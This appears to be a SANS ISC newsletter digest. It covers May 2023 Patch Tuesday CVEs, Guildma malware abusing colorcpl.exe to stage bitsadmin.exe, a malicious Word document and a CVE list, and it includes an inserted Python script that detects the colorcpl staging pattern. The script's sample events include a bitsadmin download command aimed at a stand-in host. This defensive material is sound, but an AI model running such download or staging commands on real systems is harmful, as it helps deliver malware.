Microsoft May 2023 Patch Tuesday
Published: 2023-05-09
Last Updated: 2023-05-09 17:41:35 UTC
by Renato Marinho (Version: 1)
This month we got patches for 49 vulnerabilities. Of these, 6 are critical, and 2 are already being exploited, according to Microsoft.
One of the exploited vulnerabilities is a Win32k Elevation of Privilege Vulnerability (CVE-2023-29336). This vulnerability has low attack complexity, requires low privileges, and needs no user interaction. The attack vector is local, the CVSS is 7.8, and the severity is Important.
The second exploited vulnerability is Secure Boot Security Feature Bypass Vulnerability (CVE-2023-24932). According to the advisory, to exploit the vulnerability, an attacker who has physical access or Administrative rights to a target device could install an affected boot policy. The CVSS for this vulnerability is 6.7 and its severity is Important.
Among the critical vulnerabilities, there is a Remote Code Execution (RCE) affecting Windows Network File System (CVE-2023-24941). According to the advisory, this vulnerability could be exploited over the network by making an unauthenticated, specially crafted call to a Network File System (NFS) service to trigger a Remote Code Execution (RCE). The advisory also details a mitigation procedure. The CVSS for this vulnerability is 9.8, the highest for this month.
A second critical vulnerability worth mentioning is an RCE affecting Windows Lightweight Directory Access Protocol (LDAP) (CVE-2023-28283). According to the advisory, an unauthenticated attacker who successfully exploited this vulnerability could gain code execution through a specially crafted set of LDAP calls to execute arbitrary code within the context of the LDAP service. The attack complexity is high, which means that successful exploitation of this vulnerability requires an attacker to win a race condition. The CVSS for this vulnerability is 8.1.
Read the full entry:
https://isc.sans.edu/diary/Microsoft+May+2023+Patch+Tuesday/29826/
Guildma is now abusing colorcpl.exe LOLBIN
Published: 2023-05-05
Last Updated: 2023-05-05 17:00:59 UTC
by Renato Marinho (Version: 1)
While analyzing a Guildma (AKA Astaroth) sample recently uploaded to MalwareBazaar, we came across a chain of LOLBIN abuse. It is not uncommon to see malicious code using the LOLBIN ‘bitsadmin.exe’ to download artifacts from the Internet. However, what is interesting in this case is that Guildma first copies ‘bitsadmin.exe’ to a less suspect path using ‘colorcpl.exe’, another LOLBIN, before executing it.
The ‘colorcpl.exe’ binary is the command line tool to open the Windows Color Management panel. When used without parameters, it just opens the tool. If a file is given as a parameter, ‘colorcpl.exe’ will copy the file to the ‘c:\windows\system32\spool\drivers\color\’ path. This path is writable by any user, so there is nothing here related to abusing the binary to access a privileged location. It seems to be a way to not draw the attention of security controls by avoiding using the ‘copy’ command.
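The two-step pattern described above (colorcpl.exe given a file argument, then a known LOLBIN running out of the world-writable color profile directory) leaves a clear trace in process-creation telemetry. As an added example that is not part of the ISC diary, the Python below runs two detection rules over a few constructed events shaped like Sysmon Event ID 1 records; the field names, the sample events and the LOLBIN list are assumptions for the example.

```python
"""Detect colorcpl.exe-assisted LOLBIN staging (added example, not ISC code)."""
import ntpath
from dataclasses import dataclass

# Directory colorcpl.exe copies its argument into; it is writable by any user.
COLOR_DIR = "\\spool\\drivers\\color\\"

# Illustrative list of binaries that should never execute from that directory;
# extend it with whatever LOLBINs your environment watches (assumption).
KNOWN_LOLBINS = {"bitsadmin.exe"}

# Constructed process-creation events (Sysmon Event ID 1 style fields; assumption).
SAMPLE_EVENTS = [
    {"ts": "2023-05-05T10:00:01Z", "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\colorcpl.exe",
     "cmdline": "colorcpl.exe C:\\Windows\\System32\\bitsadmin.exe"},
    {"ts": "2023-05-05T10:00:02Z", "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\spool\\drivers\\color\\bitsadmin.exe",
     "cmdline": "bitsadmin.exe /transfer job /download http://example.invalid/a C:\\Users\\Public\\a.dat"},
    {"ts": "2023-05-05T11:15:00Z", "parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\colorcpl.exe",
     "cmdline": "colorcpl.exe"},                       # benign: opens the panel, no file
    {"ts": "2023-05-05T11:20:00Z", "parent": "C:\\Windows\\System32\\svchost.exe",
     "image": "C:\\Windows\\System32\\bitsadmin.exe",
     "cmdline": "bitsadmin.exe /list"},                 # benign: expected path
]


@dataclass
class Alert:
    ts: str
    severity: str
    message: str


def _basename(path: str) -> str:
    return ntpath.basename(path).lower()


def _first_argument(cmdline: str) -> str:
    """Everything after the executable token, with surrounding quotes removed."""
    parts = cmdline.split(None, 1)
    return parts[1].strip().strip('"') if len(parts) > 1 else ""


def detect(events) -> list:
    """Apply both rules to each event and return the alerts in event order."""
    alerts = []
    for ev in events:
        image = _basename(ev["image"])
        arg = _first_argument(ev["cmdline"])

        # Rule 1: colorcpl.exe with a file argument copies that file into COLOR_DIR.
        # Copying a known LOLBIN there is the Guildma pattern, so rate it higher.
        if image == "colorcpl.exe" and arg:
            severity = "high" if _basename(arg) in KNOWN_LOLBINS else "medium"
            alerts.append(Alert(ev["ts"], severity,
                                f"colorcpl.exe invoked with file argument {arg}; "
                                f"file is copied into the color profile directory"))

        # Rule 2: a known LOLBIN executing from the color profile directory.
        if COLOR_DIR in ev["image"].lower() and image in KNOWN_LOLBINS:
            alerts.append(Alert(ev["ts"], "high",
                                f"known LOLBIN {image} executing from {ev['image']}"))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"{alert.ts} [{alert.severity}] {alert.message}")
```

Rule 1 alone produces some noise from users who genuinely install colour profiles, which is why the severity is only raised when the copied file is a known LOLBIN; rule 2 is the high-confidence signal, since nothing legitimate should run a renamed or relocated system binary out of that directory.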
Read the full entry:
https://isc.sans.edu/diary/Guildma+is+now+abusing+colorcplexe+LOLBIN/29814/
Infostealer Embedded in a Word Document
Published: 2023-05-04
Last Updated: 2023-05-04 05:33:19 UTC
by Xavier Mertens (Version: 1)
When attackers design malicious documents, one of their challenges is to make the potential victim confident to perform dangerous actions: click on a link, disable a security feature, etc. The best example is probably VBA macros in Microsoft Office documents. Disabled by default, the attacker must make the user confident to enable them by clicking on the “yellow ribbon” on top of the document.
Yesterday I found a malicious document that implements another approach. The SHA256 is c2d55f54c26d6f73908c7138e999fadcb9a8617fea8f56cee943f93956adfa12 and the VT score is 27/59.
Read the full entry:
https://isc.sans.edu/diary/Infostealer+Embedded+in+a+Word+Document/29810/
Exploratory Data Analysis with CISSM Cyber Attacks Database - Part 2 (2023.05.10)
https://isc.sans.edu/diary/Exploratory+Data+Analysis+with+CISSM+Cyber+Attacks+Database+Part+2/29828/
Quickly Finding Encoded Payloads in Office Documents (2023.05.07)
https://isc.sans.edu/diary/Quickly+Finding+Encoded+Payloads+in+Office+Documents/29818/
Exploratory Data Analysis with CISSM Cyber Attacks Database - Part 1 (2023.05.06)
https://isc.sans.edu/diary/Exploratory+Data+Analysis+with+CISSM+Cyber+Attacks+Database+Part+1/29816/
The list is assembled by pulling recent vulnerabilities from NIST NVD, Microsoft, Twitter mentions of vulnerabilities, ISC Diaries and Podcast, and the CISA list of known exploited vulnerabilities. There are also some unscored, but significant, vulnerabilities at the end. This includes vulnerabilities that have not been added to the NVD yet.

CVE-2023-29336 - Win32k Elevation of Privilege Vulnerability
Product: Microsoft Win32k
CVSS Score: 7.8
** KEV since 2023-05-09 **
NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-29336
ISC Diary: https://isc.sans.edu/diary/29826
MSFT Details: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-29336

CVE-2023-24902 - Win32k Elevation of Privilege Vulnerability
Product: Microsoft Win32k
CVSS Score: 7.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-24902
ISC Diary: https://isc.sans.edu/diary/29826
MSFT Details: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-24902

CVE-2023-24941 - Windows Network File System Remote Code Execution Vulnerability
Product: Microsoft Windows Network File System
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-24941
ISC Diary: https://isc.sans.edu/diary/29826
MSFT Details: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-24941

CVE-2023-24901 - Windows NFS Portmapper Information Disclosure Vulnerability
Product: Microsoft Windows
CVSS Score: 7.5
NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-24901
ISC Diary: https://isc.sans.edu/diary/29826
MSFT Details: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-24901

CVE-2023-24939 - Server for NFS Denial of Service Vulnerability
Product: Microsoft Server for NFS
CVSS Score: 7.5
NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-24939
ISC Diary: https://isc.sans.edu/diary/29826
MSFT Details: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-24939

CVE-2023-24943 - Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability
Product: Microsoft Windows
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-24943
ISC Diary: https://isc.sans.edu/diary/29826
MSFT Details: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-24943

CVE-2023-24940 - Windows Pragmatic General Multicast (PGM) Denial of Service Vulnerability
Product: Microsoft Windows PGM
CVSS Score: 7.5
NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-24940
ISC Diary: https://isc.sans.edu/diary/29826
MSFT Details: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-24940

CVE-2023-28283 - Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability
Product: Microsoft Windows Lightweight Directory Access Protocol (LDAP)
CVSS Score: 8.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-28283
ISC Diary: https://isc.sans.edu/diary/29826
MSFT Details: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-28283

CVE-2023-24932 - Secure Boot Security Feature Bypass Vulnerability
Product: Microsoft Windows
CVSS Score: 6.7
NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-24932
ISC Diary: https://isc.sans.edu/diary/29826
MSFT Details: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-24932

CVE-2023-1730 - SupportCandy WordPress plugin before 3.1.5 allows unauthenticated attackers to perform SQL injection attacks due to lack of input validation.
Product: SupportCandy
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-1730
NVD References: https://wpscan.com/vulnerability/44b51a56-ff05-4d50-9327-fc9bab74d4b7

CVE-2023-30869 - Easy Digital Downloads plugin allows unauthenticated users to escalate privileges due to improper authentication.
Product: Sandhillsdev Easy Digital Downloads
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-30869
NVD References:
- https://patchstack.com/articles/critical-easy-digital-downloads-vulnerability?_s_id=cve
- https://patchstack.com/database/vulnerability/easy-digital-downloads/wordpress-easy-digital-downloads-plugin-3-1-1-4-1-unauthenticated-privilege-escalation-vulnerability?_s_id=cve

CVE-2023-2479 - OS Command Injection in GitHub repository appium/appium-desktop prior to v1.22.3-4.
Product: Appium Appium-Desktop
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-2479
NVD References:
- https://github.com/appium/appium-desktop/commit/12a988aa08b9822e97056a09486c9bebb3aad8fe
- https://huntr.dev/bounties/fbdeec3c-d197-4a68-a547-7f93fb9594b4

CVE-2023-29778 - GL.iNET MT3000 4.1.0 Release 2 is vulnerable to OS Command Injection via /usr/lib/oui-httpd/rpc/logread.
Product: GL-iNet GL-MT3000
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-29778
NVD References:
- http://glinet.com
- https://github.com/OlivierLaflamme/cve/blob/main/GL.iNET/MT3000/get_nginx_log_RCE.md

CVE-2023-2459 - Chromium: CVE-2023-2459 Inappropriate implementation in Prompts
Product: Google Chrome
CVSS Score: 0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-2459
ISC Diary: https://isc.sans.edu/diary/29826
MSFT Details: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-2459
NVD References:
- https://chromereleases.googleblog.co…